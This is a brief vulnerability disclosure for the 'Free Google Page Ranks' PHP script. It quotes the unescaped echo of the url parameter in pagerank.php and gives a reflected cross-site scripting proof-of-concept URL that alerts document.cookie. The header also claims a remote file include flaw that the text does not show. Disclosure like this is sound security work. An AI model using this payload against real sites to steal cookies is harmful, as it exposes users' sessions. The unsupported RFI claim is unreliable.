Free Google Page Ranks suffers from a cross site scripting vulnerability.
6a7b5769eaf2b6e4f1e9fef83e9aa1ed9e5895012437d70d223dd6a4e043e690
-----------------:Remote File Include/cross site script:-----------------
script:Free Google Page Ranks Script/EziScript
------------------------------------------------------------------
download from:http://eziscript.com/uploads/2009/12/googlepagerankv1.1.zip
------------------------------------------------------------------
........................................................
vul:/pagerank.php
?><? if (isset($_REQUEST['url'])) { echo pagerank($_REQUEST['url']); } line 161
------------------------------------------------------
-----------------------------------------------------
exploit:
http://127.0.0.1/pagerank.php?url="><script>alert(document.cookie)</script>
***************************************************
***************************************************
---------------------------------------------------
Author: sarabande <?php echo 'bizi eskiler tanýr yeniler örnek alýr!'; ?>
---------------------------------------------------
_________________________________________________________________
Yeni Windows 7: Gündelik iþlerinizi basitleþtirin. Size en uygun bilgisayarý bulun.
http://windows.microsoft.com/shop